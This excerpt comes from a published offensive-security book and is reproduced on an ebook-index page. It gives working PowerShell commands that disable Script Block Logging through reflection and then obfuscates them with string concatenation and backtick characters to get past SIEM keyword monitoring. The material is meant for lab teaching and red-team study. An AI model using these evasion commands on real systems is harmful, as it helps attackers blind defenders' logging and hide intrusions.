How to Hack Like a Legend by Sparc Flow
Author:Sparc Flow [Sparc Flow]
Language: eng
Format: epub
Publisher: No Starch Press
Published: 2022-10-18T00:00:00+00:00
We need to disguise these terms while making sure theyâre still usable. NonPublic and ScriptBlockLogging are simple strings, so we can use classic concatenation techniques to prevent detection. Letâs revisit the previous commands that disable Script Block Logging. 'NonPublic,Static' becomes 'No'+'nPublic,Static' and 'EnableScriptBlockLogging' becomes 'EnableScriptBloc'+'kLogging':
PS C:\Lab> $dict = $utils.GetField('cachedGroupPolicySettings', 'No'+'nPublic,Static') PS C:\Lab> $key = "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBl"+"ockLogging" PS C:\Lab> $dict.getValue("")[$key]['EnableScriptBloc'+'kLogging']=0
Weâve managed to hide two strings out of three, but what about the GetField method? Youâd be surprised by the flexibility offered by PowerShellâs syntax. We can enclose a method call in double or single quotes, and it will still work perfectly fine:
..."GetField"('cachedGroupPolicySettings', 'No'+'nPublic,Static')
Oh, but look at that! Now GetField is a string, so we can apply classic concatenation techniques again, with extra parentheses added to make sure the concatenation occurs first:
...("Ge"+"tField")('cachedGroupPolicySettings', 'No'+'nPublic,Static')
Now for the grand finale, the cherry on top of this obfuscation awesomenessâwe can add ` tick marks inside strings and they will be ignored, meaning the command will still execute normally. The only constraint is that you shouldnât use the tick mark before the characters 0, a, b, f, n, r, t, or v, lest they be interpreted as the special characters null, alert, backspace, form feed, newline, carriage return, horizontal tab, and vertical tab, respectively. Here we add a tick mark before the letter âiâ in GetField:
...("Ge"+"tF`ield")('cachedGroupPolicySettings', 'No'+'nPublic,Static')
The special characters just mentioned are case-sensitive, so nothing forbids us from placing a tick mark in front of an uppercase F, for instance:
...("Ge"+"t`F`ield")('cachedGroupPolicySettings', 'No'+'nPublic,Static')
The final Script Block Logging code now looks like the following:
PS C:\Lab> $utils = [ref].Assembly.GetType('System.Management.Automation.Utils') PS C:\Lab> $dict = $utils.("Ge"+"t`F`ield")('cachedGroupPolicySettings', 'NonP'+'ublic,Static') PS C:\Lab> $key = "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBl"+"ockLogging" PS C:\Lab> $dict.getValue("")[$key]['EnableS'+'criptBlockLogging'] = 0
When we run these commands in our test lab, each one gets logged as expected, but they are all categorized as Verbose rather than a full-on Warning (Figure 8-4) and thus drown in the midst of the thousand meaningless other Verbose messages. Whatâs more, the obfuscation techniques weâve applied will likely bypass any keyword monitoring performed by QRadar.
Figure 8-4: The obfuscation techniques bypass keyword monitoring, and our attack blends into the sea of Verbose logs.
Download
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.
Management Strategies for the Cloud Revolution: How Cloud Computing Is Transforming Business and Why You Can't Afford to Be Left Behind by Charles Babcock(4131)
Ego Is the Enemy by Ryan Holiday(3991)
Offensive Shellcode from Scratch by Rishalin Pillay(3667)
Exploring Deepfakes by Bryan Lyon and Matt Tora(3253)
Robo-Advisor with Python by Aki Ranin(3033)
Learning C# by Developing Games with Unity 2021 by Harrison Ferrone(2872)
Speed Up Your Python with Rust by Maxwell Flitton(2850)
Liar's Poker by Michael Lewis(2811)
Agile Security Operations by Hinne Hettema(2805)
Linux Command Line and Shell Scripting Techniques by Vedran Dakic and Jasmin Redzepagic(2804)
OPNsense Beginner to Professional by Julio Cesar Bueno de Camargo(2802)
Extreme DAX by Michiel Rozema & Henk Vlootman(2790)
Essential Cryptography for JavaScript Developers by Alessandro Segala(2740)
Elevating React Web Development with Gatsby by Samuel Larsen-Disney(2730)
Python for ArcGIS Pro by Silas Toms Bill Parker(2645)
AI-Powered Commerce by Andy Pandharikar & Frederik Bussler(2642)
Cryptography Algorithms by Massimo Bertaccini(2627)
Incident Response Techniques for Ransomware Attacks by Oleg Skulkin(2626)
Distributed .NET with Microsoft Orleans by Bhupesh Guptha Muthiyalu Suneel Kumar Kunani(2625)